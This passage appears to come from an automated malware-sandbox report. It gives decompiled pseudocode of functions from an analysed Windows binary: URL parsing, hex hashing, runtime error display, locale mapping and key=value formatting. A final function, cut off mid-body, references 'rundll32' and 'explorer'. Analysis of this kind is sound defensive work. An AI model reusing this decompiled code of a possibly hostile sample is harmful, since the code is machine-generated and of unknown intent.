String ID: The change will take effect on next launch...Please reboot your computer.$VBCABLE Settings$http://www.facebook.com/pages/VB-Audio-Software/396002733802606$http://www.vb-audio.com$http://www.vb-cable.com$open
API String ID: 2697723495-305876929
Opcode ID: 6ca41875a5a5dd64532a189b281f19e1b11d6fbe90ebf9ebfd05a0aeb9f09956
Instruction ID: a4b70d8e39191fc549faaf501da86aeb9c8e6f077dca2208f8895d5d0ed58bf7
Opcode Fuzzy Hash: 6ca41875a5a5dd64532a189b281f19e1b11d6fbe90ebf9ebfd05a0aeb9f09956
Instruction Fuzzy Hash: 90212531B88310BAE5203794AE8FF9E2354AF44B14F21813BFA557A1C2D2FC6C44558E

Uniqueness

Uniqueness Score: -1.00%

Function 100212F0, Relevance: 16.7, APIs: 11, Instructions: 232
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E100212F0(void* __ebx, void* __edi, void* __esi, intOrPtr _a4, intOrPtr* _a8, void* _a12, intOrPtr* _a16, intOrPtr* _a20, intOrPtr* _a24) {
				char _v8;
				char _v12;
				char* _v16;
				char* _v20;
				char _v24;
				char _v28;
				char _v32;
				char _v35;
				char _v39;
				char _v43;
				char _v44;
				void* _t86;
				void* _t88;
				intOrPtr _t91;
				void* _t92;
				void* _t120;
				void* _t140;
				void* _t141;
				void* _t191;
				void* _t192;
				void* _t193;
				void* _t194;
				void* _t195;
				void* _t196;

				_t192 = __esi;
				_t191 = __edi;
				_t141 = __ebx;
				_v32 = 0;
				_v20 = "https://";
				_v16 = "http://";
				_v12 = 0;
				_v8 = 0;
				_v28 = 0;
				_v24 = 0;
				_v44 = 0;
				_v43 = 0;
				_v39 = 0;
				_v35 = 0;
				_t86 = E10001A50(_a4, _v20);
				_t194 = _t193 + 8;
				if(_t86 != 0) {
					L2:
					_v8 = _a4;
					_t88 = E10001A50(_a4, _v20);
					_t195 = _t194 + 8;
					if(_t88 == 0) {
						 *_a8 = 0;
						_v8 = _v8 + 7;
						 *_a20 = 0x50;
					} else {
						 *_a8 = 1;
						_v8 = _v8 + 8;
						 *_a20 = 0x1bb;
					}
					_t91 = E10001A50(_v8, "/");
					_t196 = _t195 + 8;
					_v28 = _t91;
					if(_v28 == 0) {
						_t92 = E1000CAD0(_v8);
						_t196 = _t196 + 4;
						_v24 = _t92 + 1;
					} else {
						_v24 = _v28 - _v8 + 1;
					}
					 *_a12 = L1000CEAF(_t141, _v24, _t191, _t192, _v24);
					E1000CF80(_t191,  *_a12, 0, _v24);
					E1000D1F0(_t141, _t191, _t192,  *_a12, _v8, _v24 - 1);
					_v28 = E10001A50(_v8, "/");
					if(_v28 == 0) {
						_v24 = 2;
						 *_a24 = L1000CEAF(_t141, _v24, _t191, _t192, _v24);
						E1000CF80(_t191,  *_a24, 0, _v24);
						E1000E2E0( *_a24, "/");
					} else {
						_v24 = E1000CAD0(_v8) - _v28 - _v8 + 1;
						 *_a24 = L1000CEAF(_t141, _v28 - _v8, _t191, _t192, _v24);
						E1000CF80(_t191,  *_a24, 0, _v24);
						E1000E2E0( *_a24, _v28);
					}
					_v8 = E10001A50( *_a12, ":");
					if(_v8 == 0) {
						_t181 = _a12;
						_v24 = E1000CAD0( *_a12) + 1;
					} else {
						_v24 = _v8 -  *_a12 + 1;
						_t120 = E1000CAD0( *_a12);
						_t181 =  &_v44;
						E1000D1F0(_t141, _t191, _t192,  &_v44, _v8 + 1, _t120 - _v24);
						E1000E645( &_v44, "%d", _a20);
					}
					 *_a16 = L1000CEAF(_t141, _t181, _t191, _t192, _v24);
					E1000CF80(_t191,  *_a16, 0, _v24);
					E1000D1F0(_t141, _t191, _t192,  *_a16,  *_a12, _v24 - 1);
					_v32 = 1;
				} else {
					_t140 = E10001A50(_a4, _v16);
					_t194 = _t194 + 8;
					if(_t140 != 0) {
						goto L2;
					}
				}
				return _v32;
			}

0x100212f0
0x100212f0
0x100212f0
0x100212f6
0x100212fd
0x10021304
0x1002130b
0x10021312
0x10021319
0x10021320
0x10021327
0x1002132d
0x10021330
0x10021333
0x1002133e
0x10021343
0x10021348
0x10021362
0x10021365
0x10021370
0x10021375
0x1002137a
0x1002139c
0x100213a8
0x100213ae
0x1002137c
0x1002137f
0x1002138b
0x10021391
0x10021391
0x100213bd
0x100213c2
0x100213c5
0x100213cc
0x100213e0
0x100213e5
0x100213eb
0x100213ce
0x100213d7
0x100213d7
0x100213fd
0x1002140b
0x10021424
0x1002143d
0x10021444
0x10021499
0x100214af
0x100214bd
0x100214d0
0x10021446
0x1002145d
0x1002146f
0x1002147d
0x1002148f
0x10021494
0x100214eb
0x100214f2
0x1002153e
0x1002154f
0x100214f4
0x100214ff
0x10021508
0x1002151b
0x1002151f
0x10021534
0x10021539
0x10021561
0x1002156f
0x1002158a
0x10021592
0x1002134a
0x10021352
0x10021357
0x1002135c
0x00000000
0x00000000
0x1002135c
0x1002159f

APIs

_strlen.LIBCMT ref: 100213E0
_memset.LIBCMT ref: 1002140B
_strlen.LIBCMT ref: 1002144A
_memset.LIBCMT ref: 1002147D
_strcat.LIBCMT ref: 1002148F
_memset.LIBCMT ref: 100214BD
_strcat.LIBCMT ref: 100214D0
_strlen.LIBCMT ref: 10021508
_sscanf.LIBCMT ref: 10021534

Part of subcall function 1000E645: _vscan_fn.LIBCMT ref: 1000E65A

_strlen.LIBCMT ref: 10021544
_memset.LIBCMT ref: 1002156F

Memory Dump Source

Source File: 00000000.00000002.375368869.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.375350516.0000000010000000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.375538711.0000000010024000.00000002.00000001.sdmp Download File
Associated: 00000000.00000002.376469298.0000000010334000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.376481695.0000000010339000.00000002.00000001.sdmp Download File
Associated: 00000000.00000002.376487113.000000001033A000.00000004.00000001.sdmp Download File

Similarity

API ID: _memset_strlen$_strcat$_sscanf_vscan_fn
String ID:
API String ID: 3056589307-0
Opcode ID: 403152bf92db43274024c9a4f77463d3bbea5a1632cdc500d382b8df9f3c8fe4
Instruction ID: 4b51f2b05251f5ad84218d7a5ee60ac0fbdcfae77a21dec9d6b54221d6e01b8d
Opcode Fuzzy Hash: 403152bf92db43274024c9a4f77463d3bbea5a1632cdc500d382b8df9f3c8fe4
Instruction Fuzzy Hash: 82912BF9E00209EFDB04CFA4D981AEFB7B5EF48344F104568E905AB345E635EA14CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 1001A4E0, Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 107
COMMON

Download Yara Rule

C-Code - Quality: 92%

			E1001A4E0(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags, char* _a4) {
				signed int _v8;
				char _v164;
				intOrPtr _v168;
				intOrPtr _v172;
				intOrPtr _v176;
				void* __ebp;
				void* _t36;
				void* _t75;
				void* _t80;
				void* _t81;

				_t74 = __esi;
				_t73 = __edi;
				_t57 = __ebx;
				_v8 = 0;
				_v176 = L1000CEAF(__ebx, __edx, __edi, __esi, 0x10);
				_v168 = L1000CEAF(__ebx, __edx, __edi, __esi, 0x21);
				E1000CF80(__edi, _v168, 0, 0x21);
				E1000CF80(_t73, _v176, 0, 0x10);
				_t67 = _a4;
				_t36 = E1000CAD0(_a4);
				_t80 = _t75 + 0x24;
				if(_t36 <= 0) {
					E1000E2E0(_v168, "00000000000000000000000000000000");
					_t81 = _t80 + 8;
				} else {
					E1001BC70( &_v164);
					E1001CB20( &_v164, _a4, E1000CAD0(_a4));
					_t67 =  &_v164;
					E1001CC20( &_v164, _v176);
					_t81 = _t80 + 0x1c;
					_v8 = 0;
					while(_v8 < 0x10) {
						_t67 = _v168 + _v8 * 2;
						E1000CCA3(_t73, _v168 + _v8 * 2, "%02X",  *(_v176 + _v8) & 0xff);
						_t81 = _t81 + 0xc;
						_v8 = _v8 + 1;
					}
				}
				_push(_v176);
				E1000CA40(_t57, _t73, _t74, __eflags);
				_v172 = L1000CEAF(_t57, _t67, _t73, _t74, 0x11);
				E1000CF80(_t73, _v172, 0, 0x11);
				__eflags = _v168 + 8;
				E1000D1F0(_t57, _t73, _t74, _v172, _v168 + 8, 0x10);
				_push(_v168);
				E1000CA40(_t57, _t73, _t74, __eflags);
				return _v172;
			}

0x1001a4e0
0x1001a4e0
0x1001a4e0
0x1001a4e9
0x1001a4fa
0x1001a50a
0x1001a51b
0x1001a52e
0x1001a536
0x1001a53a
0x1001a53f
0x1001a544
0x1001a5e4
0x1001a5e9
0x1001a54a
0x1001a551
0x1001a571
0x1001a580
0x1001a587
0x1001a58c
0x1001a58f
0x1001a5a1
0x1001a5c8
0x1001a5cc
0x1001a5d1
0x1001a59e
0x1001a59e
0x1001a5d6
0x1001a5f2
0x1001a5f3
0x1001a605
0x1001a616
0x1001a626
0x1001a631
0x1001a63f
0x1001a640
0x1001a651

APIs

_memset.LIBCMT ref: 1001A51B
_memset.LIBCMT ref: 1001A52E
_strlen.LIBCMT ref: 1001A53A
_strlen.LIBCMT ref: 1001A55D

Part of subcall function 1001CB20: und_memcpy.LIBCMTD ref: 1001CB9C
Part of subcall function 1001CB20: und_memcpy.LIBCMTD ref: 1001CC11

_sprintf.LIBCMT ref: 1001A5CC
_strcat.LIBCMT ref: 1001A5E4
_memset.LIBCMT ref: 1001A616

Strings

%02X, xrefs: 1001A5BA
00000000000000000000000000000000, xrefs: 1001A5D8

Memory Dump Source

Source File: 00000000.00000002.375368869.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.375350516.0000000010000000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.375538711.0000000010024000.00000002.00000001.sdmp Download File
Associated: 00000000.00000002.376469298.0000000010334000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.376481695.0000000010339000.00000002.00000001.sdmp Download File
Associated: 00000000.00000002.376487113.000000001033A000.00000004.00000001.sdmp Download File

Similarity

API ID: _memset$_strlenund_memcpy$_sprintf_strcat
String ID: %02X$00000000000000000000000000000000
API String ID: 796335831-606320477
Opcode ID: 1038390b883c05b411ff430f9458984f015da90a2c3e3efe0500212fe4d55d5b
Instruction ID: 0e7775b8e07c3591b5db09e074d1c70b9db2800ece633bf375f61c4185d71463
Opcode Fuzzy Hash: 1038390b883c05b411ff430f9458984f015da90a2c3e3efe0500212fe4d55d5b
Instruction Fuzzy Hash: B23131B9E0031CAFEB10D760DC42F9E7775DB85304F0444A4F5496B246EA71AA949B93

Uniqueness

Uniqueness Score: -1.00%

Function 00406C60, Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 100
fileCOMMON

Download Yara Rule

C-Code - Quality: 96%

			E00406C60(void* __edi, long _a4) {
				char _v164;
				char _v424;
				int _t17;
				long _t19;
				signed int _t42;
				long _t47;
				void* _t48;
				signed int _t54;
				void** _t56;
				void* _t57;

				_t48 = __edi;
				_t47 = _a4;
				_t42 = 0;
				_t17 = 0x40fa00;
				while(_t47 !=  *_t17) {
					_t17 = _t17 + 8;
					_t42 = _t42 + 1;
					if(_t17 < 0x40fa90) {
						continue;
					}
					break;
				}
				_t54 = _t42 << 3;
				_t2 = _t54 + 0x40fa00; // 0x58000000
				if(_t47 ==  *_t2) {
					_t17 =  *0x41079c; // 0x0
					if(_t17 == 1 || _t17 == 0 &&  *0x40d608 == 1) {
						_t16 = _t54 + 0x40fa04; // 0x40b658
						_t56 = _t16;
						_t19 = E00407250( *_t56);
						_t17 = WriteFile(GetStdHandle(0xfffffff4),  *_t56, _t19,  &_a4, 0);
					} else {
						if(_t47 != 0xfc) {
							if(GetModuleFileNameA(0,  &_v424, 0x104) == 0) {
								E00407BD0( &_v424, "<program name unknown>");
							}
							_push(_t48);
							_t49 =  &_v424;
							if(E00407250( &_v424) + 1 > 0x3c) {
								_t49 = E00407250( &_v424) +  &_v424 - 0x3b;
								E004037A0(E00407250( &_v424) +  &_v424 - 0x3b, "...", 3);
								_t57 = _t57 + 0x10;
							}
							E00407BD0( &_v164, "Runtime Error!\n\nProgram: ");
							E00407BE0( &_v164, _t49);
							E00407BE0( &_v164, "\n\n");
							_t12 = _t54 + 0x40fa04; // 0x40b658
							E00407BE0( &_v164,  *_t12);
							_t17 = E00408D68( &_v164, "Microsoft Visual C++ Runtime Library", 0x12010);
						}
					}
				}
				return _t17;
			}

0x00406c60
0x00406c69
0x00406c6c
0x00406c6e
0x00406c73
0x00406c77
0x00406c7a
0x00406c80
0x00000000
0x00000000
0x00000000
0x00406c80
0x00406c85
0x00406c88
0x00406c8e
0x00406c94
0x00406c9c
0x00406d8d
0x00406d8d
0x00406d98
0x00406daa
0x00406cb3
0x00406cb9
0x00406cd5
0x00406ce3
0x00406ce9
0x00406cf0
0x00406cf2
0x00406d02
0x00406d1d
0x00406d25
0x00406d2a
0x00406d2a
0x00406d39
0x00406d46
0x00406d57
0x00406d5c
0x00406d69
0x00406d7f
0x00406d87
0x00406cb9
0x00406c9c
0x00406db2

APIs

GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 00406CCD
GetStdHandle.KERNEL32(000000F4,0040B658,00000000,?,00000000), ref: 00406DA3
WriteFile.KERNEL32(00000000), ref: 00406DAA

Strings

<program name unknown>, xrefs: 00406CDD
Runtime Error!Program: , xrefs: 00406D33
..., xrefs: 00406D1F
Microsoft Visual C++ Runtime Library, xrefs: 00406D79
@A, xrefs: 00406C7B

Memory Dump Source

Source File: 00000000.00000002.367058969.0000000000406000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.367034004.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.367041208.0000000000401000.00000080.00020000.sdmp Download File
Associated: 00000000.00000002.367050695.0000000000404000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.367067999.000000000040B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.367085291.000000000040D000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.367108404.000000000040F000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.367125826.0000000000412000.00000002.00020000.sdmp Download File

Similarity

API ID: File$HandleModuleNameWrite
String ID: ...$<program name unknown>$@A$Microsoft Visual C++ Runtime Library$Runtime Error!Program:
API String ID: 3784150691-1647693526
Opcode ID: ec561903232ed76a8b5bce49d3094f78bc323a5fdecae60dbafb6eb8c7232f38
Instruction ID: 0fb857b455d91a1aa3564d0dd8ff5f06dc914241668c5633d898896f2947ee2a
Opcode Fuzzy Hash: ec561903232ed76a8b5bce49d3094f78bc323a5fdecae60dbafb6eb8c7232f38
Instruction Fuzzy Hash: 59319472B04218AEEF30EA60DD45FDA776CEF45304F10047BF549B61C0D678EA548A5E

Uniqueness

Uniqueness Score: -1.00%

Function 004081AA, Relevance: 13.7, APIs: 9, Instructions: 177
COMMON

Download Yara Rule

C-Code - Quality: 61%

			E004081AA(int _a4, int _a8, signed char _a9, char* _a12, int _a16, short* _a20, int _a24, int _a28, signed int _a32) {
				signed int _v8;
				intOrPtr _v20;
				short* _v28;
				int _v32;
				short* _v36;
				short* _v40;
				int _v44;
				void* _v60;
				int _t61;
				int _t62;
				int _t82;
				int _t83;
				int _t88;
				short* _t89;
				int _t90;
				void* _t91;
				int _t99;
				intOrPtr _t101;
				short* _t102;
				int _t104;

				_push(0xffffffff);
				_push(0x40b6f0);
				_push(E00405E4C);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t101;
				_t102 = _t101 - 0x1c;
				_v28 = _t102;
				_t104 =  *0x4109f0; // 0x0
				if(_t104 != 0) {
					L5:
					if(_a16 > 0) {
						_t83 = E004083CE(_a12, _a16);
						_pop(_t91);
						_a16 = _t83;
					}
					_t61 =  *0x4109f0; // 0x0
					if(_t61 != 2) {
						if(_t61 != 1) {
							goto L21;
						} else {
							if(_a28 == 0) {
								_t82 =  *0x410818; // 0x0
								_a28 = _t82;
							}
							asm("sbb eax, eax");
							_t88 = MultiByteToWideChar(_a28, ( ~_a32 & 0x00000008) + 1, _a12, _a16, 0, 0);
							_v32 = _t88;
							if(_t88 == 0) {
								goto L21;
							} else {
								_v8 = 0;
								E004038A0(_t88 + _t88 + 0x00000003 & 0x000000fc, _t91);
								_v28 = _t102;
								_v40 = _t102;
								_v8 = _v8 | 0xffffffff;
								if(_v40 == 0 || MultiByteToWideChar(_a28, 1, _a12, _a16, _v40, _t88) == 0) {
									goto L21;
								} else {
									_t99 = LCMapStringW(_a4, _a8, _v40, _t88, 0, 0);
									_v44 = _t99;
									if(_t99 == 0) {
										goto L21;
									} else {
										if((_a9 & 0x00000004) == 0) {
											_v8 = 1;
											E004038A0(_t99 + _t99 + 0x00000003 & 0x000000fc, _t91);
											_v28 = _t102;
											_t89 = _t102;
											_v36 = _t89;
											_v8 = _v8 | 0xffffffff;
											if(_t89 == 0 || LCMapStringW(_a4, _a8, _v40, _v32, _t89, _t99) == 0) {
												goto L21;
											} else {
												_push(0);
												_push(0);
												if(_a24 != 0) {
													_push(_a24);
													_push(_a20);
												} else {
													_push(0);
													_push(0);
												}
												_t99 = WideCharToMultiByte(_a28, 0x220, _t89, _t99, ??, ??, ??, ??);
												if(_t99 == 0) {
													goto L21;
												} else {
													goto L30;
												}
											}
										} else {
											if(_a24 == 0 || _t99 <= _a24 && LCMapStringW(_a4, _a8, _v40, _t88, _a20, _a24) != 0) {
												L30:
												_t62 = _t99;
											} else {
												goto L21;
											}
										}
									}
								}
							}
						}
					} else {
						_t62 = LCMapStringA(_a4, _a8, _a12, _a16, _a20, _a24);
					}
				} else {
					_push(0);
					_push(0);
					_t90 = 1;
					if(LCMapStringW(0, 0x100, 0x40b6e8, _t90, ??, ??) == 0) {
						if(LCMapStringA(0, 0x100, 0x40b6e4, _t90, 0, 0) == 0) {
							L21:
							_t62 = 0;
						} else {
							 *0x4109f0 = 2;
							goto L5;
						}
					} else {
						 *0x4109f0 = _t90;
						goto L5;
					}
				}
				 *[fs:0x0] = _v20;
				return _t62;
			}

0x004081ad
0x004081af
0x004081b4
0x004081bf
0x004081c0
0x004081c7
0x004081cd
0x004081d2
0x004081d8
0x00408220
0x00408223
0x0040822b
0x00408231
0x00408232
0x00408232
0x00408235
0x0040823d
0x0040825f
0x00000000
0x00408265
0x00408268
0x0040826a
0x0040826f
0x0040826f
0x0040827f
0x0040828f
0x00408291
0x00408296
0x00000000
0x0040829c
0x0040829c
0x004082a7
0x004082ac
0x004082b1
0x004082b4
0x004082d0
0x00000000
0x004082eb
0x004082fd
0x004082ff
0x00408304
0x00000000
0x00408306
0x0040830a
0x0040834c
0x0040835b
0x00408360
0x00408363
0x00408365
0x00408368
0x00408382
0x00000000
0x0040839c
0x0040839f
0x004083a0
0x004083a1
0x004083a7
0x004083aa
0x004083a3
0x004083a3
0x004083a4
0x004083a4
0x004083bd
0x004083c1
0x00000000
0x00000000
0x00000000
0x00000000
0x004083c1
0x0040830c
0x0040830f
0x004083c7
0x004083c7
0x00000000
0x00000000
0x00000000
0x0040830f
0x0040830a
0x00408304
0x004082d0
0x00408296
0x0040823f
0x00408251
0x00408251
0x004081da
0x004081da
0x004081db
0x004081de
0x004081f4
0x00408210
0x00408338
0x00408338
0x00408216
0x00408216
0x00000000
0x00408216
0x004081f6
0x004081f6
0x00000000
0x004081f6
0x004081f4
0x00408340
0x0040834b

APIs

LCMapStringW.KERNEL32(00000000,00000100,0040B6E8,00000001,00000000,00000000,?,00000100,00000000,00000000,00000001,00000020,00000100,?,00000000), ref: 004081EC
LCMapStringA.KERNEL32(00000000,00000100,0040B6E4,00000001,00000000,00000000,?,00000100,00000000,00000000,00000001,00000020,00000100,?,00000000), ref: 00408208
LCMapStringA.KERNEL32(00000000,?,00000100,00000020,00000001,00000000,?,00000100,00000000,00000000,00000001,00000020,00000100,?,00000000), ref: 00408251
MultiByteToWideChar.KERNEL32(00000000,00000101,00000100,00000020,00000000,00000000,?,00000100,00000000,00000000,00000001,00000020,00000100,?,00000000), ref: 00408289
MultiByteToWideChar.KERNEL32(00000000,00000001,00000100,00000020,00000100,00000000,?,00000100,00000000,00000000,00000001,00000020,00000100,?,00000000), ref: 004082E1
LCMapStringW.KERNEL32(00000000,?,00000100,00000000,00000000,00000000,?,00000100,00000000,00000000,00000001,00000020,00000100,?,00000000), ref: 004082F7
LCMapStringW.KERNEL32(00000000,?,00000100,00000000,00000001,00000000,?,00000100,00000000,00000000,00000001,00000020,00000100,?,00000000), ref: 0040832A
LCMapStringW.KERNEL32(00000000,?,00000100,00000000,?,00000000,?,00000100,00000000,00000000,00000001,00000020,00000100,?,00000000), ref: 00408392

Memory Dump Source

Source File: 00000000.00000002.367058969.0000000000406000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.367034004.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.367041208.0000000000401000.00000080.00020000.sdmp Download File
Associated: 00000000.00000002.367050695.0000000000404000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.367067999.000000000040B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.367085291.000000000040D000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.367108404.000000000040F000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.367125826.0000000000412000.00000002.00020000.sdmp Download File

Similarity

API ID: String$ByteCharMultiWide
String ID:
API String ID: 352835431-0
Opcode ID: 0059dfa9e69d9a54c9fa06535160f9e4815a5f92d159834d479f4c8b58195077
Instruction ID: 6ff6068f324a42b5108f94410a9797b454fcd57a7a566a74789c166c11932f20
Opcode Fuzzy Hash: 0059dfa9e69d9a54c9fa06535160f9e4815a5f92d159834d479f4c8b58195077
Instruction Fuzzy Hash: 76517C71500609EBCF218F54CE45AEF7FB9FB89B50F10413AF950B12A0D73A8951DBA9

Uniqueness

Uniqueness Score: -1.00%

Function 1002199A, Relevance: 13.6, APIs: 9, Instructions: 123
COMMON

Download Yara Rule

C-Code - Quality: 87%

			E1002199A(void* __ebx, void* __edx, void* __edi) {
				void* _t60;
				void* _t80;
				void* _t101;
				void* _t154;
				void* _t156;
				void* _t158;
				void* _t171;

				L0:
				while(1) {
					L0:
					_t150 = __edi;
					_t106 = __ebx;
					 *((intOrPtr*)(_t154 - 0xe2e0)) =  *((intOrPtr*)(_t154 - 0xe2e0)) + 1;
					_t60 = E10002270(_t154 - 0xe2a4);
					_t174 =  *((intOrPtr*)(_t154 - 0xe2e0)) - _t60;
					if( *((intOrPtr*)(_t154 - 0xe2e0)) >= _t60) {
						break;
					}
					L2:
					E1000CF80(__edi, _t154 - 0xab84, 0, 0x3710);
					E1000CF80(_t150, _t154 - 0x3d54, 0, 0x3710);
					_t80 = E10001A50(E100011E0(E100030B0(_t154 - 0xe2a4, _t174,  *((intOrPtr*)(_t154 - 0xe2e0)))), "=");
					_t151 = _t80 - E100011E0(E100030B0(_t154 - 0xe2a4, _t174,  *((intOrPtr*)(_t154 - 0xe2e0))));
					E1000D1F0(__ebx, _t150, _t80 - E100011E0(E100030B0(_t154 - 0xe2a4, _t174,  *((intOrPtr*)(_t154 - 0xe2e0)))), _t154 - 0xab84, E100011E0(E100030B0(_t154 - 0xe2a4, _t174,  *((intOrPtr*)(_t154 - 0xe2e0)))), _t80 - E100011E0(E100030B0(_t154 - 0xe2a4, _t174,  *((intOrPtr*)(_t154 - 0xe2e0)))));
					E1000D903( *((intOrPtr*)(_t154 - 0xe2e0)), _t154 - 0x3d54, 0x3710, E10001A50(E100011E0(E100030B0(_t154 - 0xe2a4, _t174,  *((intOrPtr*)(_t154 - 0xe2e0)))), "=") + 1);
					E1000CF80(_t150, _t154 - 0xe294, 0, 0x3710);
					E1000CF80(_t150, _t154 - 0x746c, 0, 0x3710);
					E1000CCA3(_t150, _t154 - 0xe294,  *((intOrPtr*)(_t154 - 0x3d58)), _t154 - 0xab84);
					_push(_t154 - 0x3d54);
					_push(_t154 - 0xe294);
					_push( *((intOrPtr*)(_t154 + 8)));
					E1000CCA3(_t150, _t154 - 0x746c,  *((intOrPtr*)(_t154 - 0x7470)),  *((intOrPtr*)(_t154 - 0x18)));
					_t171 = _t156 + 0x7c;
					if( *((intOrPtr*)( *((intOrPtr*)(_t154 + 0x28)))) != 0) {
						E1000D1F0(_t106, _t150, _t151,  *((intOrPtr*)( *((intOrPtr*)(_t154 + 0x28)))) +  *((intOrPtr*)(_t154 - 0x14)), _t154 - 0x746c, E1000CAD0(_t154 - 0x746c));
						_t171 = _t171 + 0x10;
					}
					_t101 = E1000CAD0(_t154 - 0x746c);
					_t156 = _t171 + 4;
					 *((intOrPtr*)(_t154 - 0x14)) = _t101 +  *((intOrPtr*)(_t154 - 0x14));
				}
				L5:
				 *((char*)(_t154 - 4)) = 1;
				E100011A0(_t154 - 0xe2dc);
				 *((char*)(_t154 - 4)) = 0;
				E10003090(_t154 - 0xe2a4);
				 *((intOrPtr*)(_t154 - 4)) = 0xffffffff;
				E100011A0(_t154 - 0xe2c0);
				 *(_t154 - 0x10) = "\r\n%s%s%s\r\n";
				 *((char*)(_t154 - 0x21c)) = 0;
				E1000CF80(__edi, _t154 - 0x21b, 0, 0x1ff);
				_push( *((intOrPtr*)(_t154 - 0x18)));
				_push( *((intOrPtr*)(_t154 + 8)));
				E1000CCA3(_t150, _t154 - 0x21c,  *(_t154 - 0x10),  *((intOrPtr*)(_t154 - 0x18)));
				_t158 = _t156 + 0x20;
				if( *((intOrPtr*)( *((intOrPtr*)(_t154 + 0x28)))) != 0) {
					E1000D1F0(__ebx, _t150, _t151,  *((intOrPtr*)( *((intOrPtr*)(_t154 + 0x28)))) +  *((intOrPtr*)(_t154 - 0x14)), _t154 - 0x21c, E1000CAD0(_t154 - 0x21c));
					_t158 = _t158 + 0x10;
				}
				 *((intOrPtr*)(_t154 - 0x14)) = E1000CAD0(_t154 - 0x21c) +  *((intOrPtr*)(_t154 - 0x14));
				 *[fs:0x0] =  *((intOrPtr*)(_t154 - 0xc));
				return  *((intOrPtr*)(_t154 - 0x14));
			}

0x1002199a
0x1002199a
0x1002199a
0x1002199a
0x1002199a
0x100219a3
0x100219af
0x100219b4
0x100219ba
0x00000000
0x00000000
0x100219c0
0x100219ce
0x100219e4
0x10021a0b
0x10021a2e
0x10021a52
0x10021a91
0x10021aa7
0x10021abd
0x10021ada
0x10021ae8
0x10021aef
0x10021af3
0x10021b06
0x10021b0b
0x10021b14
0x10021b36
0x10021b3b
0x10021b3b
0x10021b45
0x10021b4a
0x10021b50
0x10021b50
0x10021b58
0x10021b58
0x10021b62
0x10021b67
0x10021b71
0x10021b76
0x10021b83
0x10021b88
0x10021b8f
0x10021ba4
0x10021baf
0x10021bb3
0x10021bc3
0x10021bc8
0x10021bd1
0x10021bf3
0x10021bf8
0x10021bf8
0x10021c0d
0x10021c16
0x10021c21

APIs

_memset.LIBCMT ref: 100219CE
_memset.LIBCMT ref: 100219E4
_strcpy_s.LIBCMT ref: 10021A91
_memset.LIBCMT ref: 10021AA7
_memset.LIBCMT ref: 10021ABD
_sprintf.LIBCMT ref: 10021ADA
_sprintf.LIBCMT ref: 10021B06

Part of subcall function 1000CCA3: __output_l.LIBCMT ref: 1000CCF6

_strlen.LIBCMT ref: 10021B1D
_strlen.LIBCMT ref: 10021B45
_memset.LIBCMT ref: 10021BA4
_sprintf.LIBCMT ref: 10021BC3
_strlen.LIBCMT ref: 10021BDA
_strlen.LIBCMT ref: 10021C02

Memory Dump Source

Source File: 00000000.00000002.375368869.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.375350516.0000000010000000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.375538711.0000000010024000.00000002.00000001.sdmp Download File
Associated: 00000000.00000002.376469298.0000000010334000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.376481695.0000000010339000.00000002.00000001.sdmp Download File
Associated: 00000000.00000002.376487113.000000001033A000.00000004.00000001.sdmp Download File

Similarity

API ID: _memset$_strlen$_sprintf$__output_l_strcpy_s
String ID:
API String ID: 3854912713-0
Opcode ID: ce6b15c3fcdaa56ceb52cb1d185c127a632914fc5c4c1566f2125b128dce72e4
Instruction ID: 1147c12dce7df64e2ed4ffc9360bb1615f7fbc1f7e9a2ddb3abdd0b7a3fb9a22
Opcode Fuzzy Hash: ce6b15c3fcdaa56ceb52cb1d185c127a632914fc5c4c1566f2125b128dce72e4
Instruction Fuzzy Hash: 6B41A6B6D001186BDB14D7A0DC92EEE737DEF04240F0448A5F50DB6246EB757B488BA2

Uniqueness

Uniqueness Score: -1.00%

Function 10022530, Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 137
COMMON

Download Yara Rule

C-Code - Quality: 86%

			E10022530(void* __ebx, void* __edi, void* __esi, void* __eflags, signed int _a4) {
				intOrPtr _v8;
				signed int _v12;
				char _v16;
				intOrPtr _v20;
				char _v24;
				char _v36;
				char _v292;
				signed int _v296;
				char _v300;
				intOrPtr _v304;
				char _v308;
				intOrPtr _v312;
				void* __ebp;
				char _t61;
				char _t62;
				signed int _t70;
				intOrPtr _t102;
				intOrPtr _t103;
				char _t115;
				char _t116;
				signed int _t118;

				_t132 = __esi;
				_t131 = __edi;
				_t101 = __ebx;
				_t61 = "rundll32"; // 0x646e7572
				_v24 = _t61;
				_t102 =  *0x100264e4; // 0x32336c6c
				_v20 = _t102;
				_t115 =  *0x100264e8; // 0x0
				_v16 = _t115;
				_t62 = "explorer"; // 0x6c707865
				_v308 = _t62;
				_t103 =  *0x100264f0; // 0x7265726f
				_v304 = _t103;
				_t116 =  *0x100264f4; // 0x0
				_v300 = _t116;
				E1000CF80(__edi,  &_v292, 0, 0x108);
				E1001F1B0( &_v24,  &_v292,  &_v24);
				E1000D1F0(__ebx, _t131, __esi,  &_v36,  &_v308, 8);
